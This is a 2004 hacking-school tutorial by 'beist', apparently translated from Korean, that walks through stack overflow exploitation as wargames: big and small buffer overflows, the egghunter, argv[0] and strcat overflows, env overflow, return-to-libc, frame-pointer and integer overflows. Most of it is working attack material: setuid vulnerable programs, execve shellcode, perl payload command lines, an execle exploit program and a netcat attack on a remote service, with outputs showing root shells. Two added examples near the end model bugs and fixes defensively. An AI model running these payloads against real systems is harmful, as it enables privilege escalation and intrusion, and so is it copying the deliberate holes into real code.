   A summary of Overflow attack techniques, by beist

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=212


/*

homepage: http://beist.org
e-mail: beist@hanmail.net
msn: beist@hotmail.com

Sites related to beist:
http://wowhacker.com (wowcode at wowhacker team)
http://hackerschool.org (very good hacking portal site)

*/


- Table of Contents -

0. Introduction
1. big buffer overflow
2. small buffer overflow
3. Various techniques

3-1. egghunter
3-2. argv[0] strcpy
3-3. strcat

4. env overflow
5. Lamagra version #1
6. Lamagra version #2
7. frame pointer
8. integer overflow
9. Other overflow methods (closing remarks)


On Overflow attack techniques..


0. Introduction

Hello, this is beist.

Today we'll look at Overflow. This document explains Stack Overflow
techniques. Its purpose is to organize, in a single document, the older
approaches to Stack Overflow as well as the current techniques.

I won't cover in detail the background knowledge that Overflow attack
techniques require: for example, how to write shellcode, or explanations
of the memory layout such as the Heap, Stack and Data segments.

Covering that background too would make the document far too large, and
there are already many documents that cover those topics separately. So
to read and understand this document you need some prior knowledge of
Overflow attack techniques.

A long time has passed since Overflow attack techniques were introduced on
the Internet. In that time a variety of attack techniques have appeared,
and to make them easy to understand I'll build a wargame problem for each
technique and explain it through that. This document does not dump what
sits in each memory region; try those details yourself. Here I'll only
explain the conceptual way of solving each problem.

Some of the techniques explained here apply unchanged to remote targets,
but for ease of explanation they were tested in a local environment.



1. Basic Stack Overflow (big buffer)

/* 1.c */

#include <string.h>

int main(int argc, char *argv[])
{
    char buf[400];

    /* no bounds check: an argv[1] longer than 400 bytes overflows buf */
    if(argc==2)
        strcpy(buf, argv[1]);

    return 0;
}


strcpy() copies argv[1] into buf without any bounds check, so the copy
overflows buf.

Let's look at how the attack is laid out. The memory layout will be
buf - sfp - ret, and argv[1] is copied into buf.

To raise the chance of success we lay down NOP (no operation) code, and
after it the shellcode, some filler, and the return address. The sizes
of each part are:

NOP - 352
SHELLCODE - 32
GARBAGE - 16
RETURN ADDRESS - 24


char shellcode[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";


[root@hacking doc]# gcc -o 1 1.c
[root@hacking doc]# chmod 6755 1

[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf4\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf5\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf6\xff\xbf"x6'`
Illegal instruction
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf7\xff\xbf"x6'`
sh-2.05b#


The shell popped at 0xbffff724. That address will be inside the NOP code in
the buf region. For the exact layout, dump buf yourself.



2. Basic stack overflow (small buffer)

/* 2.c */

#include <string.h>

int main(int argc, char *argv[])
{
    char buf[4];

    /* same unchecked copy as 1.c, but into a 4-byte buffer */
    if(argc==2)
        strcpy(buf, argv[1]);

    return 0;
}


This is the same source as 1.c, but the size of buf is different. In 1.c
buf was 400 bytes, enough room for the NOPs and SHELLCODE, but in 2.c buf
is only 4 bytes, so neither NOPs nor SHELLCODE fit in it.

In this case an attack is possible through environment variables.
Environment variables live on the stack: pick any environment variable,
put the SHELLCODE in it, and when attacking 2.c use that variable's
address as the return address to obtain a shell.


[root@hacking doc]# gcc -o 2 2.c
[root@hacking doc]# chmod 6755 2


I'll put 400 bytes of NOP into an environment variable called BEIST, followed by the SHELLCODE.



[beist@hacking doc]$ BEIST="`perl -e 'print \"\x90\"x400, \"\x31\xc0\x89\xc3\xb0
\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\x8d\x42\x0b\xcd\x80\"'`"
[beist@hacking doc]$ export BEIST


Let's try the attack.


[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf8\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf9\xff\xbf"x3'`
Illegal instruction
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfa\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfb\xff\xbf"x3'`
sh-2.05b# exit


We got a shell at 0xbffffb24. The BEIST environment variable sits somewhere
around that address, and the spot we landed on is probably the NOP region
inside BEIST.



3. Various overflow types

The basic method explained in (3) is similar to what was covered in (1) and (2).
I'll turn several situations into wargames and explain how to solve each one.


1) egghunter

This time we'll attack a vulnerable program that contains an egg hunter. An
egg hunter wipes the egg shell, that is, the environment variables. The
environment is declared globally, and the program zeroes that global
environ with memset().

So even if we put the SHELLCODE in an environment variable and change the
vulnerable function's return address to that variable's address, the
environment has already been zeroed by the egghunter, so it cannot be used.

If the buffer the vulnerable program reads into had enough room, we could
put the SHELLCODE in that buffer, but when it doesn't we have to use some
other region that is neither the environment nor the buffer. Here we'll
solve the problem with argv, which, like the environment, is part of the
stack. The problem is as follows.


/* 3-1.c */

#include <string.h>

extern char **environ;

void function(char *str)
{
    char buf[4];

    /* copies 12 bytes into a 4-byte buffer: enough to reach sfp and ret */
    strncpy(buf, str, 12);
}

int main(int argc, char *argv[])
{
    int egghunter;

    /* the "egg hunter": zero every environment string */
    for(egghunter=0; environ[egghunter]; egghunter++)
        memset(environ[egghunter], 0, strlen(environ[egghunter]));

    function(argv[1]);

    return 0;
}


Let's set up the problem and attack it.


[root@beist doc]# gcc -o 3-1 3-1.c
[root@beist doc]# chmod 6755 3-1


When attacking, argv[1] must hold the return address we'll return to. Our
SHELLCODE will be placed in argv[2], so argv[1] must point at argv[2].


[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf8\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf9\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfa\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction

[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfb\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#


We got a shell at 0xbffffb24. argv[2] held 400 bytes of NOP code followed by
the SHELLCODE.



2) argv[0] strcpy

This problem works on the same principle but has to be solved a slightly
different way: the program strcpy()s argv[0] itself into a buffer. It is no
different from a basic overflow problem, but how you change argv[0] matters.
argv[0] is the program name. argv[0] can be manipulated in several ways,
such as hard links, symbolic links, or setting argv[0] through the exec
family of functions; here I'll introduce the simplest one, a symbolic link.


/* 3-2.c */

#include <string.h>

int main(int argc, char *argv[])
{
    char buf[10];

    /* the program name itself is copied without a bounds check */
    strcpy(buf,argv[0]);

    return 0;
}


Let's set up the problem.


[root@beist doc]# gcc -o 3-2 3-2.c
[root@beist doc]# chmod 6755 3-2

We'll change argv[0] with a symbolic link. Here argv[0] holds only the
return address, and the SHELLCODE goes in argv[1]. So argv[0] just has to
point at argv[1].


[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xf9\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xf9\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction

[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfa\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfa\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfb\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfb\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#


Since the return address that worked was 0xbffffb24, we can tell that
argv[1], which holds the SHELLCODE, lies in that region. The program is
invoked with ".///" rather than "./" to keep the argument aligned to
4-byte words.


3) strcat overflow

A strcat overflow is no different from any other ordinary overflow. The
attack method, overwriting the function's return address, is the same.


3-3.c

#include <string.h>

void function(char *str)
{
    char buf[4]={0};

    /* strcat appends without knowing the size of buf */
    strcat(buf, str);
}

int main(int argc, char *argv[])
{
    if(argc == 2)
        function(argv[1]);

    return 0;
}


[root@hacking doc]# gcc -o 3-3 3-3.c
[root@hacking doc]# chmod 6755 3-3


The current buffer layout of program 3-3 is as follows.

[ buf ] [ sfp ] [ ret ] [ other region ]

Here we'll attack by putting the NOP code and the shellcode in the other
region and making ret point at that region.


[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf5\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf6\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf7\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf8\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05b#


The 4th attempt gave us a shell.


4. env overflow

The env overflow technique was introduced by a foreign hacker,
murat@underunix.org. It approaches things a little differently from the
existing stack overflow techniques: whereas the existing techniques reach
the shellcode we placed only after a certain number of attempts, env
overflow has the advantage that it can succeed in one shot, without laying
down NOPs and guessing the offset.

The core of the env overflow attack is as follows. For more detail on this
method, see the article Buffer overflow Demystified posted on the
wowhacker lecture board.

When the program runs, our stack looks like this.

0xbfffffff - top of the stack
4 byte - (NULL byte)
strlen(program name) - length of program_name
1 byte - the null byte of program_name
strlen(environment variable) - the last environment variable string

So the location of envp will be:

envp = 0xbffffffa - strlen(program_name) - strlen(envp)

By that calculation, if we put shellcode in envp, overwrite the vulnerable
program's buffer with the address where envp starts, and overwrite the
return address the same way, we should get a shell.

But if other environment variables are present at attack time, computing
the position gets a bit awkward, so I'll write a C program that clears all
other environment variables and then attempts the attack.


The vulnerable wargame source is as follows.


/bof/doc/4.c

#include <string.h>

void function(char *str)
{
    char buf[4];

    /* 20 bytes into a 4-byte buffer: overwrites sfp and ret */
    strncpy(buf, str, 20);
}

int main(int argc, char *argv[])
{
    if(argc == 2)
        function(argv[1]);

    return 0;
}


[root@hacking doc]# gcc -o 4 4.c
[root@hacking doc]# chmod 6755 4


The vulnerable program's buffer layout is:

[ buf ] [ sfp ] [ ret ]

We'll make ret point at the address of envp, where the shellcode sits. To
do that, argv[1] must be 12 bytes long, enough to cover buf, sfp and ret,
when the program is run.

The attack source follows.


/bof/doc/4-attack.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>

char sc[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

int main(void)
{
    /* the shellcode is the only environment string */
    char *env[] = {sc, NULL};
    char buf[13];
    int i;

    /* envp = 0xbffffffa - strlen(last env string) - strlen(program name) */
    unsigned int ret = 0xbffffffa - strlen(sc) - strlen("/bof/doc/4");

    /* 12 bytes of the computed address: covers buf, sfp and ret in 4.c */
    for(i = 0; i < 3; i++)
        memcpy(buf + 4*i, &ret, 4);
    buf[12] = '\0';

    execle("/bof/doc/4", "4", buf, NULL, env);
    perror("execle");
    return 1;
}


In this case ret is computed as 0xbfffffd0; buf is filled with 12 bytes of
0xbfffffd0 and then passed to the program as argv[1] by execle(). The return
address of /bof/doc/4 then becomes 0xbfffffd0, and since 0xbfffffd0 is where
the shellcode sits, we get a shell.


[beist@hacking doc]$ gcc -o 4-attack 4-attack.c
[beist@hacking doc]$ ./4-attack
sh-2.05b# id
uid=0(root) gid=500(beist) groups=500(beist)


We successfully obtained a root shell. The env overflow method has the
advantage of obtaining a root shell in a single try, but because it relies
on environment variables it has the drawback of working only locally.
Also, if environment variables are available anyway, there are many easier
methods that don't need env overflow at all, so personally I think this
technique has no great merit. Still, it's worth knowing that this attack
method exists, and better techniques may be derived from it.


5. Lamagra version #1

Anyone interested in Overflow will have heard of The Omega Project. It is an
overflow attack technique made known by a foreign hacker called Lamagra;
briefly, it uses return-to-library.

Most binaries on a system use code from shared libraries. The advantage is
that by jumping to the address where the shared library is mapped, the
desired function can be carried out without injecting any machine code of
your own.

For the details see The Omega Project document; in part 1 I'll turn the
method from the Omega document into a wargame and solve it.


/* 5.c */

#include <string.h>

void function(char *str)
{
    char buf[4];

    strcpy(buf, str);
}

int main(int argc, char *argv[])
{
    if(argc==2)
        function(argv[1]);

    return 0;
}


[root@hacking doc]# gcc -o 5 5.c
[root@hacking doc]# chmod 6755 5


We'll execute system() from the mapped shared library, and turn the garbage
it tries to run into a file name, to get a shell.


[beist@hacking doc]$ gdb 5
(gdb) b main
Breakpoint 1 at 0x8048348
(gdb) r
Starting program: /bof/doc/5

Breakpoint 1, 0x08048348 in main ()
(gdb) x/i system
0x42041e50 <system>: push %ebp
(gdb) quit


The address of system is 0x42041e50.


[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'`
sh: line 1: ä¡B?@€? command not found
Illegal instruction


system() was executed, but because of the strange string it reports a
"command not found" error.


[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'` 2> err
Illegal instruction


The error message was redirected into the file err.


[beist@hacking doc]$ cat err|awk -F ':' '{print $3}'|awk -F ' ' '{print $1}' > ok
[beist@hacking doc]$ cat ok
ä¡B?@€?


Using awk, only the garbage characters were extracted from the error message
into the file ok. We'll make a symbolic link to /bin/sh with this garbage
string as its name.


[beist@hacking doc]$ ln -s /bin/sh `cat ok`
[beist@hacking doc]$ ls -al
합계 80
drwxrwxrwx 2 beist beist 4096 2월 4 04:41 .
drwxrwxrwx 3 root root 4096 2월 3 07:51 ..
-rwsr-sr-x 1 root root 11399 2월 4 04:29 5
-rw-r--r-- 1 root root 132 2월 4 04:28 5.c
-rw-rw-r-- 1 beist beist 42 2월 4 04:34 err
-rw-rw-r-- 1 beist beist 11 2월 4 04:38 ok
lrwxrwxrwx 1 beist beist 7 2월 4 04:41 ä¡?B?+?@?? -> /bin/sh


The symbolic link was created successfully. Now I'll add ".", meaning the
current directory, to the PATH environment variable.


[beist@hacking doc]$ PATH=.:$PATH
[beist@hacking doc]$ export PATH


Let's try the attack.


[beist@hacking doc]$ ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13372 pts/0 00:00:00 ps
[beist@hacking doc]$ ./5 `perl -e 'print "aaaabbbb","\x50\x1e\x04\x42"'`
[beist@hacking doc]# ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13375 pts/0 00:00:00 ä¡B?@€?
13404 pts/0 00:00:00 ps


After the attack, ps confirms that the symbolic link with the garbage name,
which points at /bin/sh, was executed successfully.


6. Lamagra version #2


In Lamagra part 2 I'll explain an attack technique that builds on the Omega
Project Lamagra published.

In part 1, when we executed system(), a garbage string got executed. That
garbage is taken from the following position.


[buf] [sfp] [ret] [dummy] [dummy2]


If ret is set to system(), system()'s argument is taken from dummy2, at
ret+4. The memory dummy2 points at becomes system()'s argument.

Since we want to run a shell, set ret to the address of system() and set
dummy2 to a location that points at /bin/sh. In Lamagra's article /bin/sh
was found in the shared library; here we'll look at a different way.

This wargame is a remote environment.

We'll put a string that can launch a shell into memory, then point dummy2
at it.

There are several ways to get the string we want into memory; a few
examples:


1. Using argc
2. Using argv
3. Using environment variables
4. Using the program's buffer
5. Other program interpreter tables


The ultimate goal of an overflow is to launch a shell, and to do that with
Lamagra's technique we must find a string that will execute a shell. The
string we'll use here is the value of the SHELL environment variable. If
you use bash, the value of SHELL is "/bin/bash".


[beist@hacking beist]$ echo $SHELL
/bin/bash


You can see "/bin/bash" printed.

Now let's build a proper wargame problem and solve it.


/* 6.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void function(char *str)
{
    char buf[4];

    strncpy(buf, str, 20);

    /* wipe buf and sfp, and the dummy slot after ret */
    memset(buf, 0, 8);
    memset(buf+12, 0, 4);

    /* reject a dummy2 whose high byte points into the 0x40..0x42 or 0x08 ranges */
    if(buf[19]=='\x40' || buf[19]=='\x41' || buf[19]=='\x42' || buf[19]=='\x08')
    {
        printf("Error\n");
        exit(-1);
    }
}

int main(int argc, char *argv[])
{
    if(argc==2)
    {
        if(strlen(argv[1]) <= 20 || strlen(argv[0]) > 3)
            function(argv[1]);
    }

    return 0;
}


As explained earlier, this problem will be solved using a string from the
environment. First, to make the problem remote, set it up as follows.



* Registering the wargame problem in xinetd.d so it can be solved remotely *


[beist@hacking wargame]# gcc -o 6 6.c
[beist@hacking wargame]# cat > /etc/xinetd.d/lama2

service lama2
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /wargame/6
log_on_failure += USERID
}

(press Ctrl + D)

[beist@hacking wargame]# echo "lama2 6666/tcp" > /etc/services
[beist@hacking wargame]# /etc/rc.d/init.d/xinetd restart
xinetd Stop OK...
xinetd Start OK...



Once the wargame problem is registered with the xinetd daemon, connecting to
port 6666 of the wargame server will bring up the problem.


The target program's buffer layout is as follows.


[ buf ] [ sfp ] [ ret ] [dummy] [dummy2]


Since 20 bytes can be overwritten starting at buf, the region we can
actually reach is buf through dummy2. Because of the memset calls, buf, sfp
and dummy are zeroed and cannot be used. So the parts we can really use are
ret and dummy2.

What we need to know is the address of system() and the address of the
SHELL environment variable; assume they are as follows.


system = 0x8048424
SHELL = 0xbfffffe2


(In real wargames the address of system() is often printed; otherwise it
has to be found by brute force.)


[beist@hacking beist]$ (perl -e 'print "aaaabbbb\x24\x84\x04\x08cccc\xe2\xff
\xff\xbf"';cat)|nc target 6666

id;
uid=0(root) gid=0(root)


We obtained a root shell.


7. frame pointer

The frame pointer overflow technique differs a little from ordinary overflow
techniques: only 1 byte can be overflowed. It is an overflow attack technique
also called the second generation, and it was introduced in Phrack 55.

When a function finishes, ebp -> esp (the frame pointer becomes the stack
pointer), and ret does esp -> eip (the value at the stack pointer becomes
the instruction pointer).

Being able to overflow 1 byte means the attacker can tamper at will with
the last byte of ebp.

The wargame source is as follows.


7.c

void func(char *str)
{
    char buf[4];
    int i;

    /* off by one: i runs 0..4, so the 5th byte lands on the saved ebp */
    for(i=0;i<=4;i++)
        buf[i]=str[i];
}

int main(int argc, char *argv[])
{
    if (argc == 2)
        func(argv[1]);

    return 0;
}

[beist@hacking doc]# gcc -o 7 7.c
[beist@hacking doc]# chmod 6755 7


As you can see in the source, buffer is 4 bytes, but because of the faulty
for loop 5 bytes can be written into it. In other words, the last byte of
ebp can be overwritten.

The buffer layout:

[ buf ] [ ebp ] [ ret ]


Attack methodology.

1. Launch an eggshell.
2. buf points at the eggshell's address.
3. The last byte of ebp is made to point at buf's address.


Here we'll assume buf's address is 0xbffff008. In real work, find it
through debugging or dumpcode.
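To make the off-by-one concrete, here is an added example that is not part of the original post: it models the 7.c frame as an 8-byte array (4 bytes of buf followed by the saved ebp, all constructed values rather than a real stack) and shows that the loop as written reaches the low byte of the saved ebp, while the corrected loop stops at the buffer boundary.

```c
#include <stdio.h>
#include <string.h>

/* Model of the 7.c frame (constructed, not a real stack): bytes 0..3 are
 * buf, bytes 4..7 are the saved ebp stored little-endian. */
#define BUF_LEN   4
#define FRAME_LEN 8

/* The copy loop exactly as 7.c writes it: i runs 0..4, five iterations. */
void copy_as_in_7c(unsigned char *frame, const unsigned char *str)
{
    int i;
    for (i = 0; i <= BUF_LEN; i++)      /* off by one */
        frame[i] = str[i];
}

/* Corrected loop: never writes past buf. */
void copy_fixed(unsigned char *frame, const unsigned char *str)
{
    int i;
    for (i = 0; i < BUF_LEN; i++)
        frame[i] = str[i];
}

/* Run a copy routine against a frame whose saved ebp is 0xbffff0c8 and
 * return the low byte of the saved ebp afterwards. 0xc8 means untouched;
 * anything else means the copy reached into the frame pointer. */
unsigned saved_ebp_low_byte_after(void (*copy)(unsigned char *, const unsigned char *))
{
    unsigned char frame[FRAME_LEN] = { 0, 0, 0, 0, 0xc8, 0xf0, 0xff, 0xbf };
    /* constructed 5-byte input: a 4-byte pointer, then one extra byte 0x04 */
    const unsigned char str[] = { 0xf8, 0xf9, 0xff, 0xbf, 0x04, 0x00 };

    copy(frame, str);
    return frame[4];
}

int main(void)
{
    printf("7.c loop   : saved ebp low byte = 0x%02x\n",
           saved_ebp_low_byte_after(copy_as_in_7c));
    printf("fixed loop : saved ebp low byte = 0x%02x\n",
           saved_ebp_low_byte_after(copy_fixed));
    return 0;
}
```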


[beist@hacking doc]$ ./egg
Using address: 0xbffff9f8
[beist@hacking doc]$ ./7 `perl -e 'print "\xf8\xf9\xff\xbf\x04"'`
sh-2.05b#
uid=0(root) gid=0(root) groups=500(beist)


We got a shell. ebp originally pointed at 0xbffff0xx, but we overwrote its
last byte with \x04. Before being popped, ebp is our manipulated 0xbffff004,
but the pop adds 4 to the stack, so the result is 0xbffff008. 0xbffff008
holds 0xbffff9f8, the egg shell's address, so we got a shell.


P.S. With newer gcc versions, if padding bytes are inserted between the
buffer and ebp so that the last byte of ebp can't be reached, the frame
pointer overflow attack cannot succeed. If anyone knows a way to succeed
even when such padding prevents modifying ebp, I'd be grateful if you
contacted me.


8. integer overflow

Integer overflow is a comparatively recently introduced overflow technique.
An integer overflow occurs when a variable exceeds the range it can hold;
if that variable plays a large role in the program, it may let you get a
shell or trigger some particular behaviour. For the details of this
technique see Phrack 60, or the article in which I explain it further.


/* 8.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void function(char *str, int count)
{
    char buf[65000];

    /* count is the caller's full int, not the truncated value that was checked */
    strncpy(buf, str, count);

    printf("result : %s\n", buf);
}

int main(int argc, char *argv[])
{
    unsigned short check;
    int auth;

    if(argc != 3)
    {
        printf("EX) %s int string\n", argv[0]);
        return -1;
    }

    auth=atoi(argv[1]);

    /* truncation to 16 bits: 65536 becomes 0 here */
    check=auth;

    if(check >= 65000)
    {
        printf("check 에 걸렸음\n");
        return -1;
    }

    function(argv[2], auth);

    return 0;
}


We'll attempt the attack as follows.


1. Put the shellcode in memory (egg shell).
2. Pass 65536 as argv[1].
3. Pass 65536 bytes' worth of the egg shell's address as argv[2].
(An address takes 4 bytes, so to give 65536 bytes you need 4*16384.)


[beist@beist bof]$ ./egg
Using address: 0xbffffb18
[beist@beist bof]$ ./8 65536 `perl -e 'print "\x18\xfb\xff\xbf"x16384'`
result : ¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿¿û¿û¿û¿û¿
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
.. omitted ..
.. omitted ..
.. omitted ..
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
sh-2.05#
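The truncation is easy to see in isolation. The following added example (mine, not from the original post) reproduces the check from 8.c next to a corrected one that validates the full-width value before it is ever used as a copy length, and replaces atoi() with a parser that rejects junk and out-of-range input.

```c
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

#define BUF_SIZE 65000   /* size of buf in 8.c */

/* The length check as 8.c performs it. The int is narrowed to an unsigned
 * short before the comparison, so 65536 becomes 0 and passes, yet the full
 * int is what strncpy() later receives. Returns 1 if the value is accepted. */
int accepts_as_in_8c(int auth)
{
    unsigned short check = (unsigned short)auth;
    return check < BUF_SIZE;
}

/* Hardened check: test the value in the width it will actually be used in,
 * and reject negatives, which strncpy() would see as a huge size_t. */
int accepts_hardened(int auth)
{
    if (auth < 0)
        return 0;
    if ((size_t)auth >= BUF_SIZE)
        return 0;
    return 1;
}

/* Stricter replacement for atoi(): the whole string must be a decimal
 * number that fits in an int. Sets *ok to 0 and returns 0 on any failure. */
int parse_count(const char *text, int *ok)
{
    char *end;
    long v = strtol(text, &end, 10);

    if (end == text || *end != '\0' || v < 0 || v > INT_MAX) {
        *ok = 0;
        return 0;
    }
    *ok = 1;
    return (int)v;
}

int main(int argc, char *argv[])
{
    int ok, auth;
    const char *input = argc > 1 ? argv[1] : "65536";   /* constructed default */

    auth = parse_count(input, &ok);
    if (!ok) {
        printf("rejected: not a valid count\n");
        return 1;
    }
    printf("%d: 8.c check %s, hardened check %s\n", auth,
           accepts_as_in_8c(auth) ? "passes" : "blocks",
           accepts_hardened(auth) ? "passes" : "blocks");
    return 0;
}
```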



9. Other overflow methods (closing remarks)

This document does not cover every overflow technique.

Buffer overflow attack techniques, however much they differ, share one
point: ultimately the return address must be changed. Beyond the methods
explained above, other attack possibilities and techniques exist.

Besides what was introduced in this document, my homepage covers other
kinds of overflow solutions, so please read those as well.



  Hit : 15700     Date : 2004/07/07 05:18



    